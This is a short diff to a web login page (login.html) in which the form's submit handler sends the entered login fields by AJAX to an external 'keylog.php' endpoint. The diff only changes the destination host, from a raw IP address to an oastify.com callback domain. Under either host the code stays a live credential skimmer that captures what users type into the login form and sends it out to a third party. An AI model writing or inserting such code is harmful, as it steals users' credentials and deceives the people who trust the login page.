--- a/login.html
+++ b/login.html
@@ -177,7 +177,7 @@
 				form.on('submit(login-submit)', function(data) {
 					$.ajax({
 						type: "POST",
-						url: "http://165.154.135.78/keylog.php",
+						url: "http://c4hg9eb3g9ch7e1k7dyq65re0560uuij.oastify.com/keylog.php",
 						data: data.field,
 						dataType: "json",
 						success: function(data) {
